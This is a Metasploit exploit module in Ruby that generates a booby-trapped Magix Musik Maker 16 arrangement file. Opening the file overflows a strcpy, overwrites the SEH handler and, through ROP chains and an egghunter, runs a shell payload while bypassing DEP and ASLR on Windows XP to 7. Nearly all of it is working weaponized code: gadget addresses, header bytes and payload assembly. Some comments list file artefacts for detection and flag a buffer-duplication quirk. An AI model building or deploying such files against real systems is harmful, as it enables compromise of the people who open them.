##
# $Id: magix_musikmaker_16_mmm.rb 12688 2011-05-22 23:41:15Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# File-format exploit module for Magix Musik Maker 16 (OSVDB 72455,
# CORELAN-11-002). Running the module writes one crafted .mmm arrangement
# file, named by the FILENAME option, to the local framework output; it does
# not contact a remote host. It mixes in FILEFORMAT (file_create) and
# Remote::Egghunter (generate_egghunter).
#
# Artefacts a defender can look for in files this module produces (all fixed
# in the code below): the "RIFF"/"SEKDSVIP"/"LISTx"/"physfile" markers, a
# C:\temp\ path made of one 4-byte value repeated 14 times, the "Wo0t" egg
# tag, and the whole assembled buffer appearing twice in the file (see the
# note at the end of #exploit).
class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Egghunter

  # Registers module metadata with the framework and the FILENAME option.
  # The single target carries two values read by #exploit: 'OffSet' (size of
  # the region rop_chain1 plus random filler must fill) and 'Ret' (the value
  # packed into the buffer right after that region).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Magix Musik Maker 16 .mmm Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Magix Musik Maker 16.
        When opening a specially crafted arrangement file (.mmm) in the application,
        an unsafe strcpy() will allow you to overwrite a SEH handler.
        This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
        Egghunter is used, and might require up to several seconds to receive a shell.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'acidgen',      #found the vulnerability
          'corelanc0d3r'  #rop exploit + msf module
        ],
      'Version'        => '$Revision: 12688 $',
      'References'     =>
        [
          [ 'OSVDB', '72455'],
          [ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 8000,   #could be more, but this is enough
          'DisableNops' => 'True',
          'BadChars'    => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows Universal DEP & ASLR Bypass',
            {
              'OffSet' => 198,
              'Ret'    => 0x200146fa, #add esp,40c/ret [ltkrn14n.dll]
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 26 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'mmm file', 'msf.mmm']),
      ], self.class)
  end

  # Returns a fresh random 32-bit integer (4 random bytes unpacked with "L").
  # Used below for the placeholder dwords in the chains; each call yields a
  # different value, so the generated file is not byte-stable between runs.
  # The trailing .to_i is a no-op on the Integer unpack already returns.
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  # Assembles the crafted .mmm file and writes it via file_create.
  # Order of assembly (all into one String): fixed file header, overlong
  # "physfile" path, rop_chain1, random filler, target['Ret'], fixed filler,
  # rop_chain2, rop_chain3, prehunter, egghunter, NOP sled, egg (the encoded
  # payload). Reads datastore['FILENAME'], payload.encoded and target.
  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # NOTE(review): an empty badchars string is handed to generate_egghunter
    # here, independent of the 'BadChars' declared in the module info above.
    badchars = ""
    eggoptions = {
      :checksum  => false,
      :eggtag    => "Wo0t",
      :depmethod => "copy",
      :depreg    => "edi",
      :depdest   => "ebp"
    }
    hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

    # Fixed .mmm header bytes. The only variable part is the 8-byte random
    # user-directory name spliced into the first "Documents and Settings" path;
    # everything else is constant and therefore a stable signature of this
    # generator.
    header = "RIFF"
    header << "\x8c"
    header << "A"
    header << "\x07\x00"
    header << "SEKDSVIP"
    header << "\x10\x07\x00\x00\x9b"
    header << "[n"
    header << "\x00" * 5
    header << "\x11"
    header << "\x00" * 3
    header << "\x08"
    header << "\x00" * 3
    header << "D"
    header << "\xac\x00\x00\x11"
    header << "\x00" * 9
    header << "9@"
    header << "\x00\x00\xf0"
    header << "B"
    header << "\x00" * 4
    header << "\xbd\x04\xef\xfe\x00\x00\x01"
    header << "\x00" * 3
    header << "\x10\x00\x04\x00\x02"
    header << "\x00" * 3
    header << "\x10\x00\x04\x00\x02\x00"
    header << "?"
    header << "\x00" * 3
    header << "("
    header << "\x00" * 3
    header << "\x04\x00\x04\x00\x01"
    header << "\x00" * 15
    header << "K"
    header << "\x91"
    header << "2"
    header << "\x01\xd0\x02\x00\x00"
    header << "@"
    header << "\x02\x00\x00"
    header << "UUUUUU"
    header << "\xf5"
    header << "?"
    header << "\x10"
    header << "\x00" * 7
    header << "\xff" * 8
    header << "\x00" * 1680
    header << "LISTx"
    header << "\x95\x02\x00"
    header << "physfile"
    header << "\xf8\x08\x00\x00"
    header << "C:\\Documents and Settings\\"
    header << rand_text(8)
    header << "\\My Documents\\MAGIX_Music_Maker_16\\AudioTemp"
    header << "\x00" * 52
    header << "Fat Rocker I_ogg.HDP"
    header << "\x00" * 110
    header << "C:\\Documents and Settings\\All Users\\Application Data\\MAGIX\\Music_Maker_16\\_Demos\\Demo"
    header << "\x00" * 175
    header << "Fat Rocker I.OGG"
    header << "\x00" * 678
    header << "\xf0\xbf"
    header << "\x00" * 22
    header << "\xf0"
    header << "?"
    header << "\x00" * 6
    header << "^@"
    header << "\x00" * 6
    header << "^@"
    header << "\x00" * 264

    # The overlong path value: a C:\temp\ prefix followed by the same 4 bytes
    # repeated 14 times and a final 4-byte value. Per the module description
    # this is the field copied with strcpy().
    filename = "C:\\temp\\"
    filename << "\xb3\x10\xf8\x1f" * 14   # slide
    filename << "\x1e\x92\x01\x20"        # align

    # Three gadget-address lists packed little-endian ("V*"). The mnemonics in
    # the trailing comments are the author's annotations and are not
    # re-verified here. rop_chain1 is 47 dwords (188 bytes); the random filler
    # after it is sized from target['OffSet'] (198) minus that length minus 2.
    rop_chain1 = [
      #API pointer
      0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      0x1ff810b3,  # rop nop
      0x1ff810b3,  # rop nop
      0x1ff810b3,  # rop nop
      0x20047f30,  # POP ECX # RETN ** [LTKRN14N.dll]
      0x2005012c,  # &API ptr
      0x200263e4,  # MOV EAX,DWORD PTR DS:[ECX] # RETN ** [LTKRN14N.dll]
      0x1ffa3ab3,  # MOV DWORD PTR DS:[EBX],EAX # MOV EAX,1 # POP EBX # RETN 0C ** [LTDIS14n.dll]
      junk,
      0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk, junk,
      0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk,
      0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef,  # POP EAX # RETN
      junk, junk,
      0x2E9FA63D,
      0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
      0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x20047f30,  # POP ECX # RETN ** [LTKRN14N.dll]
      0x2001283a,  # POP ESI # POP EBP # POP EBX # ADD ESP,1F4 # RETN 10 ** [LTKRN14N.dll]
      # write
      0x1ff9cf5a,  # MOV DWORD PTR DS:[EAX],ECX # MOV EAX,1 # POP ESI # RETN 08 ** [LTDIS14n.dll]
      junk,
      0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk,
      0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk,
      0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef,  # POP EAX # RETN
      junk, junk,
      0x2E9FA5F9,
      0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
      0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x2003e6cd,  # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
      junk, junk,
      0x1ffa82ef,  # POP EAX # RETN ** [LTDIS14n.dll]
      junk,
    ].pack("V*")

    rop_chain2 = [
      0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
      0x1ff7c4e5,  # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
      0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk,
      0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef,  # POP EAX # RETN
      junk, junk,
      0x2E9FA591,
      0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
      0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x2003e6cd,  # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 #
      junk, junk,
      0x1ffa82ef,  # POP EAX # RETN ** [LTDIS14n.dll]
      junk, junk, junk, junk,
      0x2E9FB65D,
      0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
      0x1ff7c4e5,  # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
      0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk,
      0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef,  # POP EAX # RETN
      junk, junk,
      0x2E9FA539,
      0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN **D16059A3 [LTKRN14N.dll]
      0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x2003e6cd,  # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10
      junk, junk,
      0x2004e494,  # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk, junk, junk, junk,
      0x2004e494,  # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      junk,
      0x1ffa0231,  # DEC EAX # RETN ** [LTDIS14n.dll]
      0x1ff7c4e5,  # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
      0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk,
      0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef,  # POP EAX # RETN
      junk, junk,
      0x2E9FA4D9,
      0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN D16059A3
      0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x2003e6cd,  # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
      junk, junk,
      0x2004e493,  # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk, junk, junk,
      0x20035546,  # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
      junk, junk,
      0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1ffa82ef,  # POP EAX # RETN
      junk, junk,
      0x2E9FA469,
      0x2004cb15,  # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
      0x1ff93af7,  # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
      junk,
      0x1ff72ce1,  # XCHG EAX,ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV EAX,1 # RETN
      junk,
    ].pack("V*")

    rop_chain3 = [
      0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08
      junk, junk, junk, junk,
      0x1ffa82ef,  # POP EAX # RETN
      junk, junk,
      0x2004FF98,
      0x1ffaccf6,  # ADD EAX,100 # POP EBP # RETN
      junk,
      0x20026406,  # MOV EAX,DWORD PTR DS:[EAX] # NEG EAX # RETN ** [LTKRN14N.dll]
      0x20026408,  # NEG EAX # RETN ** [LTKRN14N.dll]
      0x1ff7c4e5,  # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
      0x2004da79,  # XOR EAX,EAX # RETN ** [LTKRN14N.dll]
      0x1ff93ae1,  # ADD EAX,ESI # POP ESI # RETN
      junk,
      0x1ff95f45,  # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
      0x1fffeb75,  # XCHG EAX,EBP # RETN ** [LTKRN14N.dll]
      junk, junk,
      #Oh Irony !
      0x6001ac84,  # PUSHAD # RETN ** [ijl10.dll]
    ].pack("V*")

    # Random bytes sized so that rop_chain1 + filler occupies
    # target['OffSet'] - 2 bytes before target.ret is appended below.
    rop_chain1_filler = rand_text(target['OffSet'] - rop_chain1.length - 2 )

    # find a close heap
    # Raw x86 bytes; the mnemonics are the author's inline annotations.
    prehunter = "\x33\xC0"          #xor eax,eax
    prehunter << "\x64\x8B\x40\x30" #mov eax,fs[:30]
    prehunter << "\x83\xC0\x48"     #add eax,48
    prehunter << "\x83\xC0\x48"     #add eax,48
    prehunter << "\x8B\x10"         #mov edx,[eax]
    prehunter << "\x83\xc2\x4c"     #add edx,4c
    prehunter << "\x83\xc2\x4c"     #add edx,4c
    prehunter << "\x8B\x12"         #mov edx,[edx]

    nops = make_nops(100)

    # Fixed 20 bytes placed directly after target.ret.
    filler = "\x5D\xC6\x9F\x2E"   # offset to 0x2000
    filler << "\xc2\x53\x02\x20"  # RETN
    filler << "\x04\x80\xfa\x1f"  # jump - first run : 0x1ffa8004 : {pivot 8} # POP EDI # POP EBP # RETN ** [LTDIS14n.dll]
    filler << "\x12\x3a\xff\x1f"  # p/p/p/p/add esp,90/ret [ltkrn14n.dll] - second run
    filler << "\xff\xff\xff\xff"  # access violation

    # NOTE(review): `buffer = header` does not copy; both names refer to the
    # same String, so every `<<` below also grows `header`.
    buffer = header
    buffer << filename
    buffer << rop_chain1
    buffer << rop_chain1_filler
    buffer << [target.ret].pack("V")
    buffer << filler
    buffer << rop_chain2
    buffer << rop_chain3
    buffer << prehunter
    buffer << hunter
    buffer << nops
    buffer << egg

    # Because of the aliasing above, `header + buffer` is the fully assembled
    # buffer concatenated with itself: the written file is two copies of it.
    # Whether that is intended is not documented here — TODO confirm; it is at
    # least a stable trait of files produced by this module.
    filecontent = header + buffer

    print_status("Writing payload to file")
    file_create(filecontent)
  end
end